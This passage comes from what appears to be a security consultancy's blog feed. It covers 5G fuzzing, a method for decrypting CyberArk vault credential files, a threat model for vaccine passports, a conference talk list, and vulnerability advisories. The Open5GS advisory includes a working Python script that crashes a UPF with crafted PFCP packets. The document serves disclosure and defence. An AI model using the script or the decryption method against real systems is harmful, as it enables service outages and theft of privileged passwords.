A good starting point for any telecoms fuzzer would be to create input from the ASN1 definitions of the protocols. This would make it easier to create test cases for specific versions of protocols, and give better coverage of the protocol compared to manually defining the input.  It would also be quicker and a lot less error prone to produce the test cases.  This approach would require writing an ASN1 parser which could generate suitable output for use with the fuzzer (a reasonable challenge in itself).

It is unlikely that source code would be available when testing a commercial 5G component.  For this reason, binary instrumentation would greatly help in guiding a fuzzer.  It is possible to use tools like Frida6 to instrument the SUT to give coverage feedback similar to AFL.

Monitoring for crashes is more challenging as the SUT may be on a remote server.  A monitoring application would need to run on the same server as the SUT to feed status information back to the fuzzer.  As Frida6 runs in the target process it could be used for monitoring as well as providing other feedback.

Another issue encountered is unexpected messages.  Some 5G protocols (e.g., NGAP) repeatedly send requests at timed intervals if an invalid response is received.  This causes problems for fuzzers like Fuzzowski 5GC which has a predefined message sequence.  Issues such as this render Fuzzowski 5GC less effective when testing a real system (these messages were disabled during our testing for the open-source products).

There are very few companies offering network fuzzers for 5G protocols and it is easy to see why.  Some fuzzers are more costly and require long testing cycles with complex configuration.  All this extra time and complexity, eats into any development cycle especially if deadlines are tight.  Outsourcing security testing particularly if a business is not resourced to conduct assessments to certain levels of accreditation, is key to easing this burden.

The Catalogue of General Security Assurance Requirements (3GPP TS 33.117 version 16.5.0 Release 16) contains a section on Robustness and Fuzz Testing with more and more operators, regulators and accreditation bodies requiring thorough fuzzing and testing of 5G components in the coming years.  To satisfy these requirements, it is clear a combination of fuzzing tools and techniques are required.

Fuzzowski 5G Modifications

A lot of work has been put into improving Fuzzowski to create our proprietary version for 5G protocols, Fuzzowski 5GC.  The following is a high-level list of functionality/fixes that have been added to the publicly available Fuzzowski1:

  • Global/Local JSON configuration files
  • Variables for requests
  • Groups to fuzz sections of a request with a set of specific values
  • Setup/Teardown for each testcase (used in GTPU fuzzer to setup GTP tunnel)
  • SCTP connections
  • HTML documentation
  • Render option to output byte stream for a request to help with debug
  • Help option to display all available options
  • Added receive strategy
  • Added more test cases to validate functionality
  • Protocols added: GTPU, PFCP, DIAMETER, SIP, NGAP/NAS
  • Lots of bug fixes and code improvements

Glossary

Term Description
SUT System Under Test
AMF Access and Mobility Management Function
UPF User Plane Function
Fuzzer Software that generates invalid input for testing applications
Coverage Guided Source code is instrumented to give source code coverage metrics to help guide the fuzzer to generate data that uncovers new execution paths within the source code.
Generational Template Fuzzing   Uses a predefined template to specify the structure of the data and then generates invalid data using an algorithm.
MME Mobility Management Entity
HSS Home Subscriber Server
gNB New Radio Node B
ASN1 Abstract Syntax Notation One (ASN.1)

References

[1] GitHub – nccgroup/fuzzowski: the Network Protocol Fuzzer that we will want to use.

[2] GitHub – demantz/frizzer: Frida-based general purpose fuzzer

[3] GitHub – aflnet/aflnet: AFLNet: A Greybox Fuzzer for Network Protocols

[4] GitHub – jtpereyda/boofuzz: A fork and successor of the Sulley Fuzzing Framework

[5] GitHub – open5gs/open5gs: Open5GS is an Open Source implementation for 5G Core and EPC

[6] Frida – A world-class dynamic instrumentation framework

[7] GitLab – Aki Helin / radamsa

How To Work with Us on Commercial Telecommunications Security Testing

NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with world-wide operators and vendors on securing their networks. NCC Group regularly undertake assessments of 3G/4G/5G networks as well as providing detailed threat assessments for clients. We have the consultant base who can look at the security threats in detail of your extended enterprise equipment, a mobile messaging platform or perhaps looking in detail at a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each of the major vendor’s equipment.

NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland.

NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs.

If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team.

Reverse engineering and decrypting CyberArk vault credential files

8 October 2021 at 08:00

Author: Jelle Vergeer

This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files.

Introduction

It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During the penetration test we tested the implementation of their AD tiering model and they used CyberArk to implement this. During the penetration test we were able to get access to the CyberArk Privileged Session Manager (PSM) server. We found several .cred CyberArk related files on this server. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault. This component stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere).

A few months later during another assignment for another customer we again found CyberArk related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like to following:

This image has an empty alt attribute; its file name is image.png
Creating a new credential file with CreateCredFile.exe
This image has an empty alt attribute; its file name is image-1-1024x224.png
The created test.cred credential file

The encryption and key generation algorithms

It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair). For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:

  • DPAPI protected machine storage
  • DPAPI protected user storage
  • Custom

The default seemed to be the custom one, and after some effort I started to understand the logic how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following:

First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:

  • The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
  • The Executable Path restriction, converted to lower case.
  • The Machine IP restriction.
  • The Machine Hostname restriction, converted to lower case.
  • The OS Username restriction, converted to lower case.
  • The 20 random bytes, or AdditionalInformation field.
This image has an empty alt attribute; its file name is image-2.png
An example base string that will be used to generate the AES key

Note that by default, the software will not apply the additional restrictions, only relying on the additional info field, present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, appended by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long.

When encrypting a value, the software generates some random bytes to use as initialization vector (IV) , and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself, combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted.

Decrypting credential files

Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk Credential files and it can be downloaded here. The additional verification attributes the software can use to include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed, or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered. In some cases the software even stores these verification attributes in the file as it asks to include the restrictions in the credential file when creating one using the CreateCredFile.exe utility.

This image has an empty alt attribute; its file name is image-3-1024x368.png
Decrypting a credential file using the decryption tool.

Defense

How to defend against attackers from decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file.

Responsible Disclosure

We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes.

Timeline:

20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.

Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)

6 October 2021 at 15:07
Vendor: Open5GS
Vendor URL: https://github.com/open5gs/open5gs
Versions affected: 1.0.0 to 2.3.3
Systems Affected: Linux
Author: mark.tedman[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2021-41794
Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)

Summary

When connecting to the UPF port for the PFCP protocol (8805) and sending an Association Setup Request followed by a Session Establishment Request with a PDI Network Instance set to ‘internet’, it causes a stack corruption to occur.

Impact

Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.

Details

Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow.  The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.

Directly affected files:

  • Function: ogs_fqdn_parse in /lib/core/ogs-3gpp-types.c
  • /lib/nas/5gs/ies.c
  • /lib/nas/eps/ies.c
  • /lib/pfcp/handler.c
  • /lib/pfcp/types.c
  • /lib/sbi/nnrf-handler.c
  • /src/mme/sgsap-handler.c
  • /src/sgwc/s11-handler.c
  • /src/smf/context.c

The following python script can be used to replicate the issue:

#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(1.0)

pfcp_association_setup_req = b'\x20\x05\x00\x1a\x00\x00\x01\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x60\x00\x04\x5f\xf4\x38\x25\x00\x59\x00\x01\x00'

pfcp_session_establishment_req = b'\x21\x32\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x39\x00\x0d\x5a\x00\x00\x00\x00\x00\x00\x00\x01\xc0\xa8\x3f\x88\x00\x01\x00\x46\x00\x38\x00\x02\x00\x01\x00\x1d\x00\x04\x1f\x00\x00\x00\x00\x02\x00\x27\x00\x14\x00\x01\x00\x00\x15\x00\x09\x01\x00\x00\x00\x0a\xc0\xa8\x3f\x88\x00\x16\x00\x08\x69\x6e\x74\x65\x72\x6e\x65\x74\x00\x5d\x00\x05\x02\x2d\x2d\x00\x02\x00\x5f\x00\x01\x00\x00\x6c\x00\x04\x00\x00\x00\x01\x00\x01\x00\x34\x00\x38\x00\x02\x00\x02\x00\x1d\x00\x04\x1f\x00\x00\x00\x00\x02\x00\x1a\x00\x14\x00\x01\x01\x00\x16\x00\x08\x69\x6e\x74\x65\x72\x6e\x65\x74\x00\x5d\x00\x05\x06\x2d\x2d\x00\x02\x00\x6c\x00\x04\x00\x00\x00\x02\x00\x03\x00\x16\x00\x6c\x00\x04\x00\x00\x00\x01\x00\x2c\x00\x01\x02\x00\x04\x00\x05\x00\x2a\x00\x01\x01\x00\x03\x00\x24\x00\x6c\x00\x04\x00\x00\x00\x02\x00\x2c\x00\x01\x02\x00\x04\x00\x13\x00\x2a\x00\x01\x00\x00\x54\x00\x0a\x01\x00\x00\x00\x00\x0a\xc0\xa8\x3f\x88\x00\x71\x00\x01\x01'

sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.close()

Recommendation

The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function.  This has been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

Users should update to the most recent version 2.3.4 or above of Open5GS.

Vendor Communication

29/09/2021: Initial email sent to Open5GS
29/09/2021: Open5GS replied with PGP Key
30/09/2021: Sent Technical Advisory to Open5GS
30/09/2021: Technical Advisory received by Open5GS
01/10/2021: Bug fixed by Open5GS
06/10/2021: Open5GS version 2.3.4 released - fixes bug

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  06/10/2021

Written by:  Mark Tedman

Assessing the security and privacy of Vaccine Passports

4 October 2021 at 20:05

There has been a lot of development lately in the field of health credentials, especially in the field of vaccine credentials. This has largely been driven by a perceived need to track and validate an individual’s vaccination status with respect to COVID-19.

This post attempts to explore the security and privacy concerns related with vaccine credential systems, by way of threat modelling and exploring the various risks and attacks conceivable against such systems. There are other concerns about these systems apart from security and privacy, mainly in the social and political realm; those issues are best left discussed by others, and we’ll restrict treatment to technical topics and attacks here. Furthermore, we’ll look at these concerns through the lens of the users of the system, rather than the maintainers of such systems – i.e from the perspective of end users looking to prove their vaccination status, and businesses or entities looking to validate said credentials. Essentially, just the public-facing parts of the system.

General overview

There are many vaccine credential systems (VCS) currently in use around the world. Many share a common format as a base for credential (such as CommonPass), while others have gone their own way in defining what a vaccine credential is. Quite a few of these initiatives are planning for going beyond the immediate need for COVID-19 vaccination tracking, branding themselves as a “smart health card” (like https://smarthealth.cards/) encompassing a broader range of health and vaccination information.

For the purposes of this exercise, we assume a simple vaccine credential system with a few defined entities. These entities include:

  • End-user: The individual trying to acquire a vaccine credential (VaxCred), which proves their COVID-19 vaccination or test status
  • Vaccination lab (VaxLab): The entity or organization that performs COVID-19 vaccination and/or SARS-CoV-2 tests and stores the result in a health backend
  • Health backend: A system that stores vaccination and test results from vaccination labs, and makes them available to the health site.
  • Health site/mobile app (HealthSite or HealthApp): The user-facing website or mobile application an end-user uses to acquire, and possibly store and display, a vaccine credential from the health backend
  • Scanner app (ScannerApp): An application that businesses or entities use to validate a vaccine credential

A generalized flow of such systems usually proceeds in the following manner:

  • End-user approaches a Vaccination lab, proves their identity to the vaccination lab, and acquires a vaccination/test
  • VaxLab communicates/stores result to health backend
  • End-user authenticates to HeathApp and acquires a VaxCred
  • End-user presents VaxCred to an entity (such as an event venue or restaurant) requiring proof of vaccination, who uses a ScannerApp to validate authenticity of their vaccine credential
  • End-user gains access to venue/physical event space on successful validation of their vaccine credential

We assume that the vaccination lab, health backend and HealthApp trust each other, can communicate securely, and store user identity and vaccination status securely. In practice, there may be many discrete labs or organizations communicating vaccine administration information to a public health authority or health backend. Since these interfaces are not generally publicly exposed, we omit discussions about securing these systems in this post.

Understanding Potential Security Threats

We break down possible security threats and concerns by phases of the interaction, namely identifying the vaccine credential system, vaccine credential acquisition, and finally, usage of the vaccine credential to prove vaccination status.

Phase 1: Identifying and trusting a vaccine credential

So far, there is no singular, standard vaccine credential system commonly used or accepted globally, and their use and acceptance varies widely across geographies and purposes. For instance, the NYS Excelsior Pass is used in New York State, whereas EU’s Digital Green certificate is more in use in the European Union. Non-government systems like IATA’s Travel Pass are used by member airlines for certain flight segments. The selection of which vaccine credential system (VCS) to use is largely dependent on the requirements of the particular activity a user wishes to engage in, and generally isn’t a choice for the user. This means an individual might have to be simultaneously enrolled in multiple VCS and have different vaccine credentials to satisfy the requirements of different entities.

Since there is no real “choice” for the end user on which VCS to use, being dependent on the context it is needed, identification of which VCS to use often becomes moot. For instance, let’s say New York State mandates use of the Excelsior Pass as validation to enter a concert venue, and users are expected to acquire a credential before reaching the venue. Users couldn’t really select another VCS as that would not be acceptable proof. the The concert organizers may share a link to the legitimate NYS Excelsior Pass app/website, making finding the the legitimate site easy for end users. There is a small likelihood of a user searching for the VCS themselves, either online on the web or on mobile app stores, and ending up on a rogue site or app seeking to harvest their personal information. This is hardly a non-zero chance possibility, and a quick search on iOS and Android app stores already shows a number of apps which claim to be “vaccine credential passports” and “health credential vaults”, but seem of sketchy provenance.

It’s worth mentioning that – like so many internet-based software systems people have for the last several years been required to use to participate in anything from electronically filing their income taxes, to ordering pizza online from their favorite pizza shop, to car registration, to the purchase of event tickets for many theatres and sports games – this lack of choice means that users are forced to accept privacy and data sharing policies of the specific VCS, without having a say in the matter (other than opting out entirely in participating in the activity that relies upon this system). This is an opportunity of VCS administrators to inspire trust in users by having clearly defined, restrictive privacy policies that reassures users of the privacy and security of their data. Vaccine credentials systems which follow principles of data minimization (i.e. limiting data collection and disclosure to the minimum required to fulfill a specific purpose) are more likely to be trusted and adopted by users.

Phase 2: Acquiring a vaccine credential

Once a user has identified a legitimate health website or mobile app VCS, they would look to actually acquiring a vaccine credential. This is usually done by providing authentication data to the HealthSite to validate the user’s identity. Authentication information may include government-issued identifiers, such as the health insurance number for some systems in Canada and a NemID for Denmark’s Coronapas, or identity verification questions such as for New York State’s Excelsior Pass.

Cybersecurity considerations for vaccine credential acquisition are listed below.

  • Security of the connection between the HealthApp and HealthSite: Does the website/application use HTTPS with modern ciphers? Can an attacker eavesdrop or intercept communications between the user’s device and the HealthSite and obtain personal information or vaccination status?
  • Authentication to HealthSite: How does the HealthSite verify my identity before producing a vaccine credential for me? Can an attacker impersonate someone else and acquire a credential for them? Does the HealthSite inadvertently let an individual ascertain someone else’s vaccination status without their consent, or leverage an information leak that lets them acquire non-public information about another user?
  • General application security concerns on the HealthSite: Is the HealthSite and supporting infrastructure built with security in mind? Is the HealthSite secure against common attacks such as SQL Injection, Server Side Request Forgery, patched server software, etc. which may be leveraged to compromise the HealthSite or HealthApp?
  • Secure storage of the vaccine credential on the user device: Is the vaccine credential stored securely on the user device? Can rogue applications or users on the device gain access to stored credentials? Does the app cache excessive information that may be revealed on compromise of the application?

While these fall under common application security concerns, the secure storage aspect of the vaccine credential is worth going into detail. After all, the vaccine credential is something that will be disclosed to external parties for verification – does it really need to be stored “securely”? The answer is, it depends! Depending on what information these credentials contain, and how they are validated, there might be a host of potential attacks and concerns unless the credential is securely stored, which is determined by how securely the system has been designed and built.

Phase 3: Validation and security of the vaccine credential

Not all vaccine credentials are the same; though many use QR-code representation as a means of providing an easy way to visually display and scan credential information, that is not universally true, and the information they hold can be vastly different. The format of the vaccine credential seems to largely fall under two categories:

  1. A digitally signed object containing vaccination data, often a JSON payload, or
  2. A unique web URL or identifier to an online service that hosts the vaccination information

The Vaccine Credential Initiative’s SMART cards and W3C’s Verifiable Credentials are examples of the former, whereas credentials provided by the Dubai Health Authority are examples of the latter.

There are certain advantages and disadvantages to each approach:

Signed Digital Object:

  • Pros:
    • Signed objects can be validated offline, and the ScannerApp does not require a persistent connection to the health backend to verify credentials
    • If well-designed, contains a limited amount of information and will not reveal more if credential is disclosed
  • Cons:
    • Information cannot be updated on a signed credential once minted; updates to vaccination status require a new credential
    • If disclosure of cryptographic signing key for credential occurs, it allows arbitrary credential forgery and requires reissuing all vaccine credentials and updating ScannerApps

Unique web URL or identifier:

  • Pros:
    • Information referenced by credential can be updated without needing new credentials
    • Individual credentials can be revoked without affecting other credentials or requiring ScannerApp updates
    • Slightly less complicated system to manage; no need to “do cryptography correctly” or manage cryptographic signing keys
  • Cons:
    • Requires ScannerApp to be online and have access to the health backend
    • There is additional attack surface exposed in the form of an endpoint that displays vaccination status, and the connection between the ScannerApp and health backend
    • If disclosed, may grant persistent access to vaccination status and/or health records, if the system has not been designed with URL/identifier expiry or revocation in mind


In both approaches, the amount of information disclosed by a vaccine credential is interesting to note from an end user perspective. If I, as an end user, want or need to use a vaccine credential before entry to a physical space, how much information am I disclosing to someone who scans my credential? If I need to flash my vaccine credential to the bouncer at a bar to gain entry, is that equivalent to me showing them my driver’s license for age verification? Or am I revealing more information than what is displayed in the app? Am I inadvertently sharing my email address, or phone number, or some other part of my medical history?

One would assume information in the vaccine credential includes, at a minimum, the user’s vaccination status, and their full name. Many also include the user’s birthdate, or a government-issued identifier; this is used in conjunction with a photo ID, such as a driver’s license, passport, or other government-issued identification, to prove identity of the individual presenting the vaccine credential. A good design principle seems to be one that adheres to data minimization, as mentioned earlier.

This is especially important when you consider the wide variety of businesses and entities that may scan your vaccine credential and ask for accompanying photo ID; whilst most folks have become comfortable with regularly flashing their driver’s license at bars and airports (and in doing so, disclosing their name, date of birth, and registered physical address, among other details), vaccine credentials may be required at a wider range of physical spaces. This could range from your neighborhood convenience stores and chain retail departments to pop-up event spaces; places that mostly never required identification to enter, but now might require government issued or verified identification.

Furthermore, from the perspective of a business or venue validating vaccine credentials, how much trust should I place on the trustworthiness of the credential presented by a user? Is the presented credential provably trustworthy, or is a forged credential? In other words, what guarantees are provided that the individual presenting the credential is the actual owner of the credential, and the credential is genuine and provides me with an accurate status of the presenter’s vaccination status?

With these systems and concerns in mind, let’s talk about possible attack vectors and threats:

  • Information disclosed by vaccine credential: Does the vaccine credential adhere to principles of data minimization? Does it disclose excessive information beyond what is required to establish identity and vaccination information?
  • Privacy and recording credential verification events: A threat related to the above is privacy concerns while displaying your credential to a scanner:
    • Is the ScannerApp caching vaccine credentials or information it scans, which may be compromised in case of ScannerApp device compromise?
    • Is the ScannerApp sharing scan or credential information with third parties?
    • Is the business validating my credential using the “official” ScannerApp? Are they using their own homegrown version or a modified version to keep track of every individual accessing their space?

      Remember that these vaccine credentials are largely government-issued or verified in some manner, which means a high confidence in the name and identity of the person displaying the credential. Consider a scenario where an individual shares their vaccine credential and their driver’s license as accompanying identification to a bouncer at a bar; there isn’t a whole lot of additional information provided here, as normally they would display their driver’s license (containing their verified name and details) anyways as age verification proof. Now consider another scenario where the same credentials are needed to enter, say, Joe’s SuperMart. Normally, no identification would be provided, but now, they may be able to record the real name and age of every individual entering their physical space. This subtle increase in “surveillance” is hard to discount completely, and privacy-respecting ScannerApps will refrain from storing this information for longer than it is needed to verify the individual’s vaccination status.
  • Credential forgery and validation: How is the vaccine credential validated? Could someone create a forged credential without actually have been vaccinated and attempt to bypass checks on the ScannerApp?
    • For signed objects, things to consider include:
      • Is the cryptographic signature correctly validated with the right cipher and public key, or could someone forge credentials and bypass validation with a malformed credential?
      • Is the cipher and key size used for signatures resistant to brute force and known attacks?
      • Is the private key used to sign the object securely managed?
      • Is the public key used for verification of the signature securely distributed to the ScannerApp?
    • For credentials that use a URL/identifier to an online system, concerns include:
      • Can the connection between Scanner app and online system be intercepted?
      • Is the URL or identifier guessable or enumerable? Could someone list or find credentials in the system?

Final Thoughts

These security considerations outlined here are in no way exhaustive, and form a small but important picture of the overall concerns one would have when evaluating the security of a new public-facing health system. Hopefully this exercise helps form the basis of what to consider when using or assessing such systems. NCC Group is looking at the evolution of the systems with great interest, and plans to apply and expand on the threat model above with a look at vaccine credential systems in future posts.

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

4 October 2021 at 15:37
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTL was referencing an event that was set to NULL before initialization. In case the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existing structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Even structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to the Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

Conference Talks – October 2021

30 September 2021 at 09:15

This month, members of NCC Group will be presenting their work at the following conferences:

  • Jennifer Fernick & external panelists, “Threatscape 2023 and Beyond: AI, Deep Fakes and Other Unexpected Challenges”, to be presented at MapleSec (Oct 6 2021)
  • Damon Small, “Which security role is right for me?”, to be presented at Shellcon  (Oct 8 2021)
  • Brian Hong , “Sleight of ARM: Demystifying Intel Houdini”, to be presented at ToorCon  (Oct 12 2021)
  • Damon Small, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, to be presented at UTINFOSEC Fall 2021  (Oct 14 2021)
  • Robert Seacord, “Secure Coding in C and C++”, to be presented at NDC TechTown 2021  (October 18-19 2021)
  • Sourya Biswas, “Security from Scratch: Reminiscing Being the 2nd Security Employee at a Startup”, to be presented at InfoSec World (Oct 25 2021)

Please join us!

Threatscape 2023 and Beyond: AI, Deep Fakes and Other Unexpected Challenges
Jennifer Fernick & external panelists
MapleSec
October 6 2021

Moderator

  • Darrin Horner, Regional Sales Manager with OKTA 

Panelists

  • Jennifer Fernick, SVP & Global Head of Research, NCC Group
  •  Dr. Hadis Karimpour, Associate Professor and  Chair in Secure and Reliable Networked Engineering Systems, University of Calgary
  • Cara Wolf, CEO, Ammolite Analytx.


Which Security Role is Right for Me?
Damon Small
ShellCon
October 8 2021

Infosec is an industry of diverse professionals, and the roles available are equally diverse. Even after one decides to pursue a career in cyber security, navigating through the myriad job types that exist can be daunting. The speakers, Damon “ch3f” Small and Paul Love, will reflect on their decades of experience in the industry and offer guidance as to how a candidate can focus their job search in specific areas of infosec. From red team, to blue team, to consulting, compliance, and management, there is a role for everyone. Attendees will have ample time for Q&A after the speakers’ prepared remarks, will gain a greater understanding of professional opportunities that exist, and will learn ow to determine which type of role may be best for themselves.


Sleight of ARM: Demystifying Intel Houdini
Brian Hong 
ToorCon
October 12 2021

Infosec is an industry of diverse professionals, and the roles available are equally diverse. Even In the recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has their own binary translator, Houdini, which runs ARM binaries on x86.
In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
UTINFOSEC Fall 2021
October 14 2021

Vulnerability Assessment is, by some, regarded as one of the least “sexy” capabilities in information security. However, it is the presenter’s view that it is also a key component of any successful infosec program, and one that is often overlooked. Doing so serves an injustice to the organization and results in many missed opportunities to help ensure success in protecting critical information assets. The presenter will explore how Vulnerability Assessment can be leveraged “Beyond the Scan” and provide tangible value to not only the security team, but the entire business that it supports.

Secure Coding in C and C++
Robert Seacord
NDC TechTown 2021
October 18-19 2021

Secure Coding in C and C++ is a two day training course that provides a detailed explanation of common programming errors in C and C++ and describes how these errors can lead to code that is vulnerable to exploitation.

Security from Scratch: Reminiscing Being the 2nd Security Employee at a Startup
Sourya Biswas    
InfoSec World
October 25 2021

What happens when a small company equipped with the brand new security program you built suddenly becomes a not-so-small company successful enough to be targeted by cyber attacks? This case study will outline the security roll-out at a startup and reveal how they remained result-oriented even on a small budget. Attendees will leave with recommendations that have since been successfully implemented by multiple other lean startups, and applicable to anyone tasked with building or rebuilding enterprise cybersecurity, or working with limited funding.

Key Takeaways:

  • Understand the thought process of a new CISO at a company without a security program.    
  • Realize what a startup’s Board typically looks for in a new security program.
  • Understand how Defense in Depth is a viable approach towards implementing security from scratch.
  • Learn about some common gaps encountered assessing startups’ security postures.

Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)

29 September 2021 at 15:39
Vendor: Garuda Linux
Vendor URL: https://garudalinux.org/ 
Versions affected: previous commit 29b03856
Systems Affected: Garuda Linux user creation panel 
Author: Jesus Olmos <jesus.olmos[at]fox-it[dot]com>
CVE Identifier: CVE-2021-3784
Risk: 4.4 - Local user impersonation in the moment of the user creation

Summary

Garuda is a modern Linux distribution based on Arch Linux with nice blur effects and icons. 

Garuda Linux performs an insecure user creation and authentication, that allows a local attacker  to impersonate a user account while it is being created. 

The user is created in two steps: 

  • First the user is created without password and without any account lock. 
  • Then the password is set. 

An authentication is requested in every step, so there is enough of a delay between steps to get access on the unprotected account. 

Furthermore, the switch-user option allows to access to the unprotected account using any random password. 

Impact

A local attacker can detect a user creation and install a backdoor to access that user account at any moment in the future. 

Details

Garuda Linux performs an insecure user creation and authentication, that allows any user to impersonate the created account with Garuda’s user management panel: 

“garuda settings manager” > “user accounts” 

In Linux often the users are created in two steps: 

  • Create the user without password but the account locked 
  • Set the password 

But in the case of Garuda there is no account lock, this is the code for step1: 

args[“arguments”] = QStringList() << “-m” << “-p” << “” << “-U” << “-G” << defaultUserGroups << username; 
installActionAdd.setArguments(args); 
KAuth::ExecuteJob* jobAdd = installActionAdd.execute(); 

